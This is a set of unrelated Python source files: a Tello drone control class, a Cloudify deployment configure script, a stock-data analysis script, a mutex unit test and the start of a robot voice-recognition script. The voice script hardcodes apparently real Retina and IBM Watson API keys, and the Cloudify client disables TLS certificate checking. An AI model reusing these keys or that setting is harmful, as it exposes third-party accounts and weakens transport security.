bool: True for successful, False for unsuccessful
"""
return self.send_control_command("flip " + direction)
def flip_left(self):
"""Tello fly flip left.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.flip("l")
def flip_right(self):
"""Tello fly flip left.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.flip("r")
def flip_forward(self):
"""Tello fly flip left.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.flip("f")
def flip_back(self):
"""Tello fly flip left.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.flip("b")
@accepts(x=int, y=int, z=int, speed=int)
def go_xyz_speed(self, x, y, z, speed):
"""Tello fly to x y z in speed (cm/s)
Arguments:
x: 20-500
y: 20-500
z: 20-500
speed: 10-100
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_command_without_return('go %s %s %s %s' % (x, y, z, speed))
@accepts(x1=int, y1=int, z1=int, x2=int, y2=int, z2=int, speed=int)
def curve_xyz_speed(self, x1, y1, z1, x2, y2, z2, speed):
"""Tello fly a curve defined by the current and two given coordinates with speed (cm/s).
- If the arc radius is not within the range of 0.5-10 meters, it responses false.
- x/y/z can’t be between -20 – 20 at the same time.
Arguments:
x1: 20-500
x2: 20-500
y1: 20-500
y2: 20-500
z1: 20-500
z2: 20-500
speed: 10-60
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_command_without_return('curve %s %s %s %s %s %s %s' % (x1, y1, z1, x2, y2, z2, speed))
@accepts(x=int, y=int, z=int, speed=int, mid=int)
def go_xyz_speed_mid(self, x, y, z, speed, mid):
"""Tello fly to x y z in speed (cm/s) relative to mission pad iwth id mid
Arguments:
x: -500-500
y: -500-500
z: -500-500
speed: 10-100
mid: 1-8
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command('go %s %s %s %s m%s' % (x, y, z, speed, mid))
@accepts(x1=int, y1=int, z1=int, x2=int, y2=int, z2=int, speed=int, mid=int)
def curve_xyz_speed_mid(self, x1, y1, z1, x2, y2, z2, speed, mid):
"""Tello fly to x2 y2 z2 over x1 y1 z1 in speed (cm/s) relative to mission pad with id mid
Arguments:
x1: -500-500
y1: -500-500
z1: -500-500
x2: -500-500
y2: -500-500
z2: -500-500
speed: 10-60
mid: 1-8
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command('curve %s %s %s %s %s %s %s m%s' % (x1, y1, z1, x2, y2, z2, speed, mid))
@accepts(x=int, y=int, z=int, speed=int, yaw=int, mid1=int, mid2=int)
def go_xyz_speed_yaw_mid(self, x, y, z, speed, yaw, mid1, mid2):
"""Tello fly to x y z in speed (cm/s) relative to mid1
Then fly to 0 0 z over mid2 and rotate to yaw relative to mid2's rotation
Arguments:
x: -500-500
y: -500-500
z: -500-500
speed: 10-100
yaw: -360-360
mid1: 1-8
mid2: 1-8
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command('jump %s %s %s %s %s m%s m%s' % (x, y, z, speed, yaw, mid1, mid2))
def enable_mission_pads(self):
return self.send_control_command("mon")
def disable_mission_pads(self):
return self.send_control_command("moff")
def set_mission_pad_detection_direction(self, x):
return self.send_control_command("mdirection " + str(x))
@accepts(x=int)
def set_speed(self, x):
"""Set speed to x cm/s.
Arguments:
x: 10-100
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("speed " + str(x))
last_rc_control_sent = 0
@accepts(left_right_velocity=int, forward_backward_velocity=int, up_down_velocity=int, yaw_velocity=int)
def send_rc_control(self, left_right_velocity, forward_backward_velocity, up_down_velocity, yaw_velocity):
"""Send RC control via four channels. Command is sent every self.TIME_BTW_RC_CONTROL_COMMANDS seconds.
Arguments:
left_right_velocity: -100~100 (left/right)
forward_backward_velocity: -100~100 (forward/backward)
up_down_velocity: -100~100 (up/down)
yaw_velocity: -100~100 (yaw)
Returns:
bool: True for successful, False for unsuccessful
"""
if int(time.time() * 1000) - self.last_rc_control_sent < self.TIME_BTW_RC_CONTROL_COMMANDS:
pass
else:
self.last_rc_control_sent = int(time.time() * 1000)
return self.send_command_without_return('rc %s %s %s %s' % (self.round_to_100(left_right_velocity),
self.round_to_100(forward_backward_velocity),
self.round_to_100(up_down_velocity),
self.round_to_100(yaw_velocity)))
@accepts(x=int)
def round_to_100(self, x):
if x > 100:
return 100
elif x < -100:
return -100
else:
return x
def set_wifi_credentials(self, ssid, password):
"""Set the Wi-Fi SSID and password. The Tello will reboot afterwords.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command('wifi %s %s' % (ssid, password))
def connect_to_wifi(self, ssid, password):
"""Connects to the Wi-Fi with SSID and password.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command('ap %s %s' % (ssid, password))
def get_speed(self):
"""Get current speed (cm/s)
Returns:
False: Unsuccessful
int: 1-100
"""
return self.send_read_command('speed?')
def get_battery(self):
"""Get current battery percentage
Returns:
False: Unsuccessful
int: -100
"""
return self.send_read_command('battery?')
def get_flight_time(self):
"""Get current fly time (s)
Returns:
False: Unsuccessful
int: Seconds elapsed during flight.
"""
return self.send_read_command('time?')
def get_height(self):
"""Get height (cm)
Returns:
False: Unsuccessful
int: 0-3000
"""
return self.send_read_command('height?')
def get_temperature(self):
"""Get temperature (°C)
Returns:
False: Unsuccessful
int: 0-90
"""
return self.send_read_command('temp?')
def get_attitude(self):
"""Get IMU attitude data
Returns:
False: Unsuccessful
int: pitch roll yaw
"""
r = self.send_read_command('attitude?').replace(';', ':').split(':')
return dict(zip(r[::2], [int(i) for i in r[1::2]])) # {'pitch': xxx, 'roll': xxx, 'yaw': xxx}
def get_barometer(self):
"""Get barometer value (m)
Returns:
False: Unsuccessful
int: 0-100
"""
return self.send_read_command('baro?')
def get_distance_tof(self):
"""Get distance value from TOF (cm)
Returns:
False: Unsuccessful
int: 30-1000
"""
return self.send_read_command('tof?')
def get_wifi(self):
"""Get Wi-Fi SNR
Returns:
False: Unsuccessful
str: snr
"""
return self.send_read_command('wifi?')
def get_sdk_version(self):
"""Get SDK Version
Returns:
False: Unsuccessful
str: SDK Version
"""
return self.send_read_command('sdk?')
def get_serial_number(self):
"""Get Serial Number
Returns:
False: Unsuccessful
str: Serial Number
"""
return self.send_read_command('sn?')
def end(self):
"""Call this method when you want to end the tello object"""
if self.is_flying:
self.land()
if self.stream_on:
self.streamoff()
if self.background_frame_read is not None:
self.background_frame_read.stop()
if self.cap is not None:
self.cap.release()
def __del__(self):
self.end()
class BackgroundFrameRead:
"""
This class read frames from a VideoCapture in background. Then, just call backgroundFrameRead.frame to get the
actual one.
"""
def __init__(self, tello, address):
tello.cap = cv2.VideoCapture(address)
self.cap = tello.cap
if not self.cap.isOpened():
self.cap.open(address)
self.grabbed, self.frame = self.cap.read()
self.stopped = False
def start(self):
Thread(target=self.update_frame, args=()).start()
return self
def update_frame(self):
while not self.stopped:
if not self.grabbed or not self.cap.isOpened():
self.stop()
else:
(self.grabbed, self.frame) = self.cap.read()
def stop(self):
self.stopped = True
|
_a4c_configure.py
|
from cloudify import ctx
from cloudify.exceptions import NonRecoverableError
from cloudify.state import ctx_parameters as inputs
import subprocess
import os
import re
import sys
import time
import threading
import platform
from StringIO import StringIO
from cloudify_rest_client import CloudifyClient
from cloudify import utils
if 'MANAGER_REST_PROTOCOL' in os.environ and os.environ['MANAGER_REST_PROTOCOL'] == "https":
client = CloudifyClient(host=utils.get_manager_ip(), port=utils.get_manager_rest_service_port(), protocol='https', trust_all=True)
else:
client = CloudifyClient(host=utils.get_manager_ip(), port=utils.get_manager_rest_service_port())
def convert_env_value_to_string(envDict):
for key, value in envDict.items():
envDict[str(key)] = str(envDict.pop(key))
def get_attribute_user(ctx):
if get_attribute(ctx, 'user'):
return get_attribute(ctx, 'user')
else:
return get_attribute(ctx, 'cloudify_agent')['user']
def get_attribute_key(ctx):
if get_attribute(ctx, 'key'):
return get_attribute(ctx, 'key')
else:
return get_attribute(ctx, 'cloudify_agent')['key']
def get_host(entity):
if entity.instance.relationships:
for relationship in entity.instance.relationships:
if 'cloudify.relationships.contained_in' in relationship.type_hierarchy:
return relationship.target
return None
def has_attribute_mapping(entity, attribute_name):
ctx.logger.info('Check if it exists mapping for attribute {0} in {1}'.format(attribute_name, entity.node.properties))
mapping_configuration = entity.node.properties.get('_a4c_att_' + attribute_name, None)
if mapping_configuration is not None:
if mapping_configuration['parameters'][0] == 'SELF' and mapping_configuration['parameters'][1] == attribute_name:
return False
else:
return True
return False
def process_attribute_mapping(entity, attribute_name, data_retriever_function):
# This is where attribute mapping is defined in the cloudify type
mapping_configuration = entity.node.properties['_a4c_att_' + attribute_name]
ctx.logger.info('Mapping configuration found for attribute {0} is {1}'.format(attribute_name, mapping_configuration))
# If the mapping configuration exist and if it concerns SELF then just get attribute of the mapped attribute name
# Else if it concerns TARGET then follow the relationship and retrieved the mapped attribute name from the TARGET
if mapping_configuration['parameters'][0] == 'SELF':
return data_retriever_function(entity, mapping_configuration['parameters'][1])
elif mapping_configuration['parameters'][0] == 'TARGET' and entity.instance.relationships:
for relationship in entity.instance.relationships:
if mapping_configuration['parameters'][1] in relationship.type_hierarchy:
return data_retriever_function(relationship.target, mapping_configuration['parameters'][2])
return ""
def get_nested_attribute(entity, attribute_names):
deep_properties = get_attribute(entity, attribute_names[0])
attribute_names_iter = iter(attribute_names)
next(attribute_names_iter)
for attribute_name in attribute_names_iter:
if deep_properties is None:
return ""
else:
deep_properties = deep_properties.get(attribute_name, None)
return deep_properties
def _all_instances_get_nested_attribute(entity, attribute_names):
return None
def get_attribute(entity, attribute_name):
if has_attribute_mapping(entity, attribute_name):
# First check if any mapping exist for attribute
mapped_value = process_attribute_mapping(entity, attribute_name, get_attribute)
ctx.logger.info('Mapping exists for attribute {0} with value {1}'.format(attribute_name, mapped_value))
return mapped_value
# No mapping exist, try to get directly the attribute from the entity
attribute_value = entity.instance.runtime_properties.get(attribute_name, None)
if attribute_value is not None:
ctx.logger.info('Found the attribute {0} with value {1} on the node {2}'.format(attribute_name, attribute_value, entity.node.id))
return attribute_value
# Attribute retrieval fails, fall back to property
property_value = entity.node.properties.get(attribute_name, None)
if property_value is not None:
return property_value
# Property retrieval fails, fall back to host instance
host = get_host(entity)
if host is not None:
ctx.logger.info('Attribute not found {0} go up to the parent node {1}'.format(attribute_name, host.node.id))
return get_attribute(host, attribute_name)
# Nothing is found
return ""
def _all_instances_get_attribute(entity, attribute_name):
result_map = {}
# get all instances data using cfy rest client
# we have to get the node using the rest client with node_instance.node_id
# then we will have the relationships
node = client.nodes.get(ctx.deployment.id, entity.node.id)
all_node_instances = client.node_instances.list(ctx.deployment.id, entity.node.id)
for node_instance in all_node_instances:
prop_value = __recursively_get_instance_data(node, node_instance, attribute_name)
if prop_value is not None:
ctx.logger.info('Found the property/attribute {0} with value {1} on the node {2} instance {3}'.format(attribute_name, prop_value, entity.node.id,
node_instance.id))
result_map[node_instance.id + '_'] = prop_value
return result_map
def get_property(entity, property_name):
# Try to get the property value on the node
property_value = entity.node.properties.get(property_name, None)
if property_value is not None:
ctx.logger.info('Found the property {0} with value {1} on the node {2}'.format(property_name, property_value, entity.node.id))
return property_value
# No property found on the node, fall back to the host
host = get_host(entity)
if host is not None:
ctx.logger.info('Property not found {0} go up to the parent node {1}'.format(property_name, host.node.id))
return get_property(host, property_name)
return ""
def get_instance_list(node_id):
result = ''
all_node_instances = client.node_instances.list(ctx.deployment.id, node_id)
for node_instance in all_node_instances:
if len(result) > 0:
result += ','
result += node_instance.id
return result
def get_host_node_name(instance):
for relationship in instance.relationships:
if 'cloudify.relationships.contained_in' in relationship.type_hierarchy:
return relationship.target.node.id
return None
def __get_relationship(node, target_name, relationship_type):
for relationship in node.relationships:
if relationship.get('target_id') == target_name and relationship_type in relationship.get('type_hierarchy'):
return relationship
return None
def __has_attribute_mapping(node, attribute_name):
ctx.logger.info('Check if it exists mapping for attribute {0} in {1}'.format(attribute_name, node.properties))
mapping_configuration = node.properties.get('_a4c_att_' + attribute_name, None)
if mapping_configuration is not None:
if mapping_configuration['parameters'][0] == 'SELF' and mapping_configuration['parameters'][1] == attribute_name:
return False
else:
return True
return False
def __process_attribute_mapping(node, node_instance, attribute_name, data_retriever_function):
# This is where attribute mapping is defined in the cloudify type
mapping_configuration = node.properties['_a4c_att_' + attribute_name]
ctx.logger.info('Mapping configuration found for attribute {0} is {1}'.format(attribute_name, mapping_configuration))
# If the mapping configuration exist and if it concerns SELF then just get attribute of the mapped attribute name
# Else if it concerns TARGET then follow the relationship and retrieved the mapped attribute name from the TARGET
if mapping_configuration['parameters'][0] == 'SELF':
return data_retriever_function(node, node_instance, mapping_configuration['parameters'][1])
elif mapping_configuration['parameters'][0] == 'TARGET' and node_instance.relationships:
for rel in node_instance.relationships:
relationship = __get_relationship(node, rel.get('target_name'), rel.get('type'))
if mapping_configuration['parameters'][1] in relationship.get('type_hierarchy'):
target_instance = client.node_instances.get(rel.get('target_id'))
target_node = client.nodes.get(ctx.deployment.id, target_instance.node_id)
return data_retriever_function(target_node, target_instance, mapping_configuration['parameters'][2])
return None
def __recursively_get_instance_data(node, node_instance, attribute_name):
if __has_attribute_mapping(node, attribute_name):
return __process_attribute_mapping(node, node_instance, attribute_name, __recursively_get_instance_data)
attribute_value = node_instance.runtime_properties.get(attribute_name, None)
if attribute_value is not None:
return attribute_value
elif node_instance.relationships:
for rel in node_instance.relationships:
# on rel we have target_name, target_id (instanceId), type
relationship = __get_relationship(node, rel.get('target_name'), rel.get('type'))
if 'cloudify.relationships.contained_in' in relationship.get('type_hierarchy'):
parent_instance = client.node_instances.get(rel.get('target_id'))
parent_node = client.nodes.get(ctx.deployment.id, parent_instance.node_id)
return __recursively_get_instance_data(parent_node, parent_instance, attribute_name)
return None
else:
return None
def download(child_rel_path, child_abs_path, download_dir):
artifact_downloaded_path = ctx.download_resource(child_abs_path)
new_file = os.path.join(download_dir, child_rel_path)
new_file_dir = os.path.dirname(new_file)
if not os.path.exists(new_file_dir):
os.makedirs(new_file_dir)
os.rename(artifact_downloaded_path, new_file)
ctx.logger.info('Downloaded artifact from path ' + child_abs_path + ', it\'s available now at ' + new_file)
return new_file
def download_artifacts(artifacts, download_dir):
downloaded_artifacts = {}
os.makedirs(download_dir)
for artifact_name, artifact_ref in artifacts.items():
ctx.logger.info('Download artifact ' + artifact_name)
if isinstance(artifact_ref, basestring):
downloaded_artifacts[artifact_name] = download(os.path.basename(artifact_ref), artifact_ref, download_dir)
else:
child_download_dir = os.path.join(download_dir, artifact_name)
for child_path in artifact_ref:
download(child_path['relative_path'], child_path['absolute_path'], child_download_dir)
downloaded_artifacts[artifact_name] = child_download_dir
return downloaded_artifacts
env_map = {}
env_map['NODE'] = ctx.node.id
env_map['INSTANCE'] = ctx.instance.id
env_map['INSTANCES'] = get_instance_list(ctx.node.id)
env_map['HOST'] = get_host_node_name(ctx.instance)
env_map['A4C_EXECUTION_HOST'] = get_attribute(ctx, 'ip_address')
env_map['A4C_EXECUTION_USER'] = get_attribute_user(ctx)
env_map['A4C_EXECUTION_KEY'] = get_attribute_key(ctx)
node_artifacts = {
"scripts": [
{
"relative_path": "stopSupp_hss.sh",
"absolute_path": "_a4c_artifact/FileSystem/scripts/scripts/stopSupp_hss.sh"
}
,
{
"relative_path": "startSupp_hss.sh",
"absolute_path": "_a4c_artifact/FileSystem/scripts/scripts/startSupp_hss.sh"
}
,
{
"relative_path": "deleteSupp_hss.sh",
"absolute_path": "_a4c_artifact/FileSystem/scripts/scripts/deleteSupp_hss.sh"
}
,
{
"relative_path": "configureSupp_hss.sh",
"absolute_path": "_a4c_artifact/FileSystem/scripts/scripts/configureSupp_hss.sh"
}
,
{
"relative_path": "relationships/supp_to_volume.sh",
"absolute_path": "_a4c_artifact/FileSystem/scripts/scripts/relationships/supp_to_volume.sh"
}
,
{
"relative_path": "createSupp_hss.sh",
"absolute_path": "_a4c_artifact/FileSystem/scripts/scripts/createSupp_hss.sh"
}
]
}
relationship_artifacts = {
}
artifacts = node_artifacts.copy()
artifacts.update(relationship_artifacts)
download_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'downloads')
env_map.update(download_artifacts(artifacts, download_dir))
if inputs.get('process', None) is not None and inputs['process'].get('env', None) is not None:
ctx.logger.info('Operation is executed with environment variable {0}'.format(inputs['process']['env']))
env_map.update(inputs['process']['env'])
def parse_output(output):
# by convention, the last output is the result of the operation
last_output = None
outputs = {}
pattern = re.compile('EXPECTED_OUTPUT_(\w+)=(.*)')
for line in output.splitlines():
match = pattern.match(line)
if match is None:
last_output = line
else:
output_name = match.group(1)
output_value = match.group(2)
outputs[output_name] = output_value
return {'last_output': last_output, 'outputs': outputs}
def execute(script_path, process, outputNames, command_prefix=None, cwd=None):
os.chmod(script_path, 0755)
on_posix = 'posix' in sys.builtin_module_names
env = os.environ.copy()
process_env = process.get('env', {})
env.update(process_env)
if outputNames is not None:
env['EXPECTED_OUTPUTS'] = outputNames
if platform.system() == 'Windows':
wrapper_path = ctx.download_resource("scriptWrapper.bat")
else:
wrapper_path = ctx.download_resource("scriptWrapper.sh")
os.chmod(wrapper_path, 0755)
command = '{0} {1}'.format(wrapper_path, script_path)
else:
command = script_path
if command_prefix is not None:
command = "{0} {1}".format(command_prefix, command)
ctx.logger.info('Executing: {0} in env {1}'.format(command, env))
process = subprocess.Popen(command,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env,
cwd=cwd,
bufsize=1,
close_fds=on_posix)
return_code = None
stdout_consumer = OutputConsumer(process.stdout)
stderr_consumer = OutputConsumer(process.stderr)
while True:
return_code = process.poll()
if return_code is not None:
break
time.sleep(0.1)
stdout_consumer.join()
stderr_consumer.join()
parsed_output = parse_output(stdout_consumer.buffer.getvalue())
if outputNames is not None:
outputNameList = outputNames.split(';')
for outputName in outputNameList:
ctx.logger.info('Ouput name: {0} value : {1}'.format(outputName, parsed_output['outputs'].get(outputName, None)))
if return_code != 0:
error_message = "Script {0} encountered error with return code {1} and standard output {2}, error output {3}".format(command, return_code,
stdout_consumer.buffer.getvalue(),
stderr_consumer.buffer.getvalue())
error_message = str(unicode(error_message, errors='ignore'))
ctx.logger.error(error_message)
raise NonRecoverableError(error_message)
else:
ok_message = "Script {0} executed normally with standard output {1} and error output {2}".format(command, stdout_consumer.buffer.getvalue(),
stderr_consumer.buffer.getvalue())
ok_message = str(unicode(ok_message, errors='ignore'))
ctx.logger.info(ok_message)
return parsed_output
class OutputConsumer(object):
def __init__(self, out):
self.out = out
self.buffer = StringIO()
self.consumer = threading.Thread(target=self.consume_output)
self.consumer.daemon = True
self.consumer.start()
def consume_output(self):
for line in iter(self.out.readline, b''):
self.buffer.write(line)
self.out.close()
def join(self):
self.consumer.join()
new_script_process = {'env': env_map}
operationOutputNames = None
convert_env_value_to_string(new_script_process['env'])
parsed_output = execute(ctx.download_resource('_a4c_impl_artifact/FileSystem/tosca.interfaces.node.lifecycle.Standard/configure/configureSupp_hss.sh'), new_script_process, operationOutputNames)
outputs = parsed_output['outputs'].items()
for k,v in outputs:
ctx.logger.info('Output name: {0} value: {1}'.format(k, v))
ctx.instance.runtime_properties['_a4c_OO:tosca.interfaces.node.lifecycle.Standard:configure:{0}'.format(k)] = v
ctx.instance.update()
|
MainProcess.py
|
"""
Created on 2017年10月7日
@author: Colin
"""
import threading
import datetime
import os
import pandas
import matplotlib.pyplot as plt
import logging.config
import math
from colin.chen.shares import Utils
from colin.chen.shares import DBUtils
from colin.chen.shares import DataAnalysis
'''logger配置'''
logging.config.fileConfig('logging.conf')
logger = logging.getLogger(__name__)
'''
调用主函数
'''
SAVE_FILE_PATH='/Users/chenke/Documents/market/'
def checkStockVolumn(begin, end, step, startDate, endDate):
counter = 0
result = []
start = 0
curTotal = end - begin
engine = DBUtils.db_connection()
while begin <= end:
if (begin <= Utils.MAXSZ):
szSpecial = Utils.change_sz_code(begin)
start = szSpecial
else:
start = str(begin)
currentRs = DBUtils.db_read_k_history_inc(start, engine, startDate, endDate)
tmpResult = DataAnalysis.check_by_vols(start, currentRs)
if tmpResult is not None:
result.append(tmpResult)
begin = begin + step
counter = counter + 1
if (counter % 100 == 0):
Utils.print_progess(counter, curTotal)
print(result)
result_frame = pandas.DataFrame(result)
filename=SAVE_FILE_PATH + 'from ' + startDate + 'to ' + endDate
if os.path.exists(filename):
result_frame.to_csv(filename,mode='a',header='None')
else:
result_frame.to_csv(filename)
return result
'''
执行过程
'''
def do_save(begin_date, finish_date):
threads = []
current_date = begin_date
end_date = finish_date
t1 = threading.Thread(target=DBUtils.save_data, args=(Utils.startSH, Utils.MAXSH, Utils.STEP, current_date, end_date))
threads.append(t1)
t2 = threading.Thread(target=DBUtils.save_data, args=(Utils.startSZ, Utils.MAXSZ, Utils.STEP, current_date, end_date))
threads.append(t2)
t3 = threading.Thread(target=DBUtils.save_data, args=(Utils.startCY, Utils.MAXCY, Utils.STEP, current_date, end_date))
threads.append(t3)
for t in threads:
t.start()
# t.join()
'''
保存股票前复权数据,批量执行
逻辑:
STEP1:获取全部基础数据
STEP2:循环分10个线程获取单个股票数据,保存
'''
def do_save_basics_batch():
engine = DBUtils.db_connection()
basic_info_rs = DBUtils.get_stock_basics(engine)
logger.info('get basic info total::::' + str(basic_info_rs.count()))
share_code_list = list(basic_info_rs[u'code'])
# time_to_market_list=list(basic_info_rs[u'timeToMarketNew'])
counter = 0
end = len(share_code_list)
while counter <= end:
threads = []
'''第一个线程'''
share_code = share_code_list[counter]
time_to_market = Utils.get_pre_year(Utils.get_current_date())
# time_to_market=time_to_market_list[counter]
logger.debug("prepare to run:::::share_code="+str(share_code)+"time_to_market="+str(time_to_market))
# t1=threading.Thread(target=do_save_basics_pre, args=(share_code,time_to_market))
do_save_basics_pre(share_code,time_to_market)
# threads.append(t1)
# counter=counter+1
# if counter > end:
# logger.info("out of end!!! end="+end+'counter='+counter)
# else:
# '''第二个线程'''
# share_code = share_code_list[counter]
# time_to_market = time_to_market_list[counter]
# t2=threading.Thread(target=do_save_basics_pre, args=(share_code,time_to_market))
# threads.append(t2)
#
# counter = counter + 1
# if counter > end:
# logger.info("out of end!!! end=" + end + 'counter=' + counter)
# break
# else:
# '''第三个线程'''
# share_code = share_code_list[counter]
# time_to_market = time_to_market_list[counter]
# t3 = threading.Thread(target=do_save_basics_pre, args=(share_code, time_to_market))
# threads.append(t3)
#
# counter = counter + 1
# if counter > end:
# logger.info("out of end!!! end=" + end + 'counter=' + counter)
# break
# else:
# '''第5个线程'''
# share_code = share_code_list[counter]
# time_to_market = time_to_market_list[counter]
# t5 = threading.Thread(target=do_save_basics_pre, args=(share_code, time_to_market))
# threads.append(t5)
#
#
# counter = counter + 1
# if counter > end:
# logger.info("out of end!!! end=" + end + 'counter=' + counter)
# break
# else:
# '''第6个线程'''
# share_code = share_code_list[counter]
# time_to_market = time_to_market_list[counter]
# t6 = threading.Thread(target=do_save_basics_pre, args=(share_code, time_to_market))
# threads.append(t6)
#
counter=counter+1
# for t in threads:
# t.start()
# t.join()
'''
保存股票前复权的数据
'''
def do_save_basics_pre(share_code, time_to_market):
engine = DBUtils.db_connection()
cur_date = Utils.get_current_date()
change_time = time_to_market
while change_time < cur_date:
next_year = Utils.get_next_year(change_time)
logger.debug('prepare to save next time range data....change_time='+str(change_time)+'next_year='+str(next_year))
DBUtils.save_stock_h_data(engine,share_code,change_time,next_year)
change_time = Utils.get_next_day(Utils.get_next_year(change_time))
def save_index(start_date, finish_date):
begin_date = start_date
end_date = finish_date
DBUtils.save_index_data_end_date(begin_date, end_date)
def do_check(start_date, finish_date):
threads = []
current_date = start_date
end_date = finish_date
t1 = threading.Thread(target=checkStockVolumn, args=(Utils.startSH, Utils.MAXSH, Utils.STEP, current_date, end_date))
threads.append(t1)
t2 = threading.Thread(target=checkStockVolumn, args=(Utils.startSZ, Utils.MAXSZ, Utils.STEP, current_date, end_date))
threads.append(t2)
t3 = threading.Thread(target=checkStockVolumn, args=(Utils.startCY, Utils.MAXCY, Utils.STEP, current_date, end_date))
threads.append(t3)
for t in threads:
t.start()
t.join()
def static_change(share_code, start_date, finish_date):
stock_change = DataAnalysis.static_single_wave(share_code, start_date, end_date)
market_pro = Utils.check_market(share_code)
market_change = DataAnalysis.static_a_wave(market_pro, start_date, finish_date)
def copy_table():
engine = DBUtils.db_connection()
sql = "select * from shares.k_his_data"
rs = pandas.read_sql_query(sql, engine)
# rsNew=rs.copy()
# rs[u'date']=rsNew[u'date'].map(changeTo)
# print(rs)
rs.to_sql('k_his_data_new', engine, if_exists='append')
def draw_pic(cur_list):
# engine = DBUtils.dbConnection()
# rs = DBUtils.dbReadKIndex("sh", engine)
# close = rs[u'close']
plt.figure("test")
plt.plot(cur_list)
plt.show()
# os.system("pause")
def test(year):
while year < 2005:
quarter = 4
# while quarter <= 4:
logger.info("\n")
logger.info("year:::"+ str(year) + " quarter:::" + str(quarter))
save_share_report(year, quarter)
# quarter = quarter + 1
year = year +1
def save_basics():
engine=DBUtils.db_connection()
DBUtils.save_stock_basics(engine)
'''
保存报表
'''
def save_share_report(year, quarter):
engine = DBUtils.db_connection()
DBUtils.save_share_report(engine, year, quarter)
DBUtils.save_share_report_profit(engine, year, quarter)
DBUtils.save_share_report_operation(engine, year, quarter)
DBUtils.save_share_report_growth(engine, year, quarter)
DBUtils.save_share_report_debt(engine, year, quarter)
DBUtils.save_share_report_cash_flow(engine, year, quarter)
'''
基本面分析展示
'''
def get_basic_info_draw(share_code, start_year, end_year, quarter):
rs = DataAnalysis.share_basic_info_analysis(share_code, start_year, end_year, quarter)
year_list = list(rs[u'year'])
cur_ration_list = list(rs[u'currentratio'])
'''将字符串转换成数字'''
cur_ration_list = list(map(lambda x:float(x), cur_ration_list))
quick_ratio_list = list(rs[u'quickratio'])
quick_ratio_list = list(map(lambda x:float(x), quick_ratio_list))
# x_start = int(year_list[0])
# x_end = int(year_list[-1])
plt.figure("test")
plt.plot(year_list, cur_ration_list, label='current ratio', color='black')
plt.plot(year_list, quick_ratio_list, label='quick ratio', color='red')
# plt.axis([x_start, x_end, 0, 1])
# plt.plot(year_list, cur_ration_list, year_list, quick_ratio_list, linewidth=2)
plt.legend()
plt.show()
print("start working...")
begin_date='2018-02-01'
end_date='2018-04-27'
check_date = '2018-02-01'
# temp_code=Utils.change_sz_code(2016)
# temp_code='002813'
# result=DataAnalysis.market_simulate(50000,temp_code,'2017-08-01','2017-11-01')
# draw_pic(result)
# do_save(begin_date, end_date)
# save_index(begin_date, end_date)
# do_check(check_date, end_date)
# static_change('300365',check_date, end_date)
# save_share_report(2017, 4)
# copyTable()
# saveIndustryIndex()
# drawPic()
# save_basics()
# test(1990)
get_basic_info_draw('300365', 2010,2017,4)
# do_save_basics_batch()
print("finish working...")
#
# code = str('000001')
# saveDataFromNowOn(1, 1, 1, '2017-01-01')
# currentRs = dbRead(code, "2017-09-01")
# currentCode = checkByVolumn(code, currentRs)
# print(currentCode)
# dbRead(str(300134),"2017-10-8")
# dbSave(str(300134),"2017-1-1")
# saveData(300134,300135,1,'2017-1-1')
|
test_error.py
|
import time
from winmutex import WinMutex, WinMutexAbandonedError
from unittest import TestCase
from threading import Thread
class TestError (TestCase):
def test_abandoned_error1 (self):
mutex = WinMutex()
def example ():
mutex.acquire(blocking=True)
thread = Thread(target=example)
thread.start()
thread.join()
self.assertRaises(WinMutexAbandonedError, mutex.acquire, blocking=True)
mutex.close()
|
voiceRecognition.py
|
"""
This is the final code structure for the R2D2 project
Cornell Cup Robotics, Spring 2019
File Created by Yanchen Zhan '22 (yz366)
"""
########## MAIN FILE STARTS HERE
#hello
### import respective package
import sys
import speech_recognition as sr
import pyaudio
import nltk
nltk.download('vader_lexicon')
nltk.download('punkt')
nltk.download('averaged_perceptron_tagger')
from nltk.sentiment.vader import SentimentIntensityAnalyzer as sid
import simpleaudio as sa
import json
import numpy as np
from gcc_phat import gcc_phat
import math
import client
import socket
import json
import time
from watson_developer_cloud import NaturalLanguageUnderstandingV1
from watson_developer_cloud.natural_language_understanding_v1 \
import Features, EntitiesOptions, KeywordsOptions, SentimentOptions
import retinasdk
#apiKey = "69ba0c10-5e17-11e9-8f72-af685da1b20e"
#apiKey = "f09d0fe0-3223-11e9-bb65-69ed2d3c7927" #FOR DEMO DAY ONLY
apiKey = "433793c0-6793-11e9-8f72-af685da1b20e"
liteClient = retinasdk.LiteClient(apiKey)
import threading
from threading import Lock, Thread
lock = Lock()
lock2 = Lock()
naturalLanguageUnderstanding = NaturalLanguageUnderstandingV1(
version='2018-11-16',
iam_apikey='_wxBEgRMBJ_WzXRWYzlTLYrNp3A0mmYEjKp-UQsdhvap')
HeyR2File = open("HeyR2File.txt", "a+")
setup_bool = False
confirmation_final = 1000
no_clue_final = 999
wakeup_final = 998
sleep_final = 997
move_final = 996
attendance_final = 995
sentiment_value = 0
def chunkify(arr):
acc_total = []
acc_chunk = np.zeros(8192, dtype='int16')
i = 0
for byte in arr:
if (i < 8192):
acc_chunk[i] = byte
i += 1
else:
acc_total.append(acc_chunk)
acc_chunk = np.zeros(8192, dtype='int16')
i = 0
return acc_total
def get_direction(buf):
SOUND_SPEED = 343.2
MIC_DISTANCE_4 = 0.08127
MAX_TDOA_4 = MIC_DISTANCE_4 / float(SOUND_SPEED)
best_guess = None
MIC_GROUP_N = 2
MIC_GROUP = [[0, 2], [1, 3]]
tau = [0] * MIC_GROUP_N
theta = [0] * MIC_GROUP_N
for i, v in enumerate(MIC_GROUP):
tau[i], _ = gcc_phat(buf[v[0]::4], buf[v[1]::4], fs=16000, max_tau=MAX_TDOA_4, interp=1)
theta[i] = math.asin(tau[i] / MAX_TDOA_4) * 180 / math.pi
if np.abs(theta[0]) < np.abs(theta[1]):
if theta[1] > 0:
best_guess = (theta[0] + 360) % 360
else:
